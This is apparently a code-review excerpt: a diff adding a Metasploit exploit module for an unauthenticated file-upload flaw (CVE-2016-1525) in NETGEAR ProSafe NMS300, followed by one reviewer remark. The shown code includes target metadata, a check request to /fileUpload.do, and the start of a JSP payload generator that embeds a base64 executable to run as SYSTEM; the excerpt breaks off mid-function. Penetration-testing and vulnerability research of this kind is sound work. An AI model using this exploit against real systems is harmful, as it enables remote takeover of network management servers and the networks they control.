modules/exploits/windows/http/netgear_nms_rce.rb

```diff
@@ -0,0 +1,146 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
+      'Description' => %q{
+      Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
+      The application has a file upload vulnerability that can be exploited by an
+      unauthenticated remote attacker to execute code as the SYSTEM user.
+      Two servlets are vulnerable, FileUploadController (located at
+      /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
+      This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
+      1.1.0.13.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2016-1525'],
+          ['US-CERT-VU', '777024'],
+          ['URL', 'TODO_GITHUB_URL'],
+          ['URL', 'TODO_FULLDISC_URL']
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 5 },
+      'Platform' => 'win',
+      'Arch' => ARCH_X86,
+      'Privileged' => true,
+      'Targets' =>
+        [
+          [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Feb 4 2016'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true,  "Application path", '/'])
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
+      'method' => 'GET'
+    })
+    if res && res.code == 405
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def generate_jsp_payload
+    exe = generate_payload_exe
+    base64_exe = Rex::Text.encode_base64(exe)
+    payload_name = rand_text_alpha(rand(6)+3)
+
+    var_raw     = rand_text_alpha(rand(8) + 3)
+    var_ostream = rand_text_alpha(rand(8) + 3)
+    var_buf     = rand_text_alpha(rand(8) + 3)
+    var_decoder = rand_text_alpha(rand(8) + 3)
+    var_tmp     = rand_text_alpha(rand(8) + 3)
+    var_path    = rand_text_alpha(rand(8) + 3)
+    var_proc2   = rand_text_alpha(rand(8) + 3)
+
+    jsp = %Q|
+    <%@page import="java.io.*"%>
+    <%@page import="sun.misc.BASE64Decoder"%>
+    <%
+    try {
+      String #{var_buf} = "#{base64_exe}";
+      BASE64Decoder #{var_decoder} = new BASE64Decoder();
+      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
+
+      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
```

Comment:
I usually use it for other modules, but in my tests I couldn't get it to work with NMS300.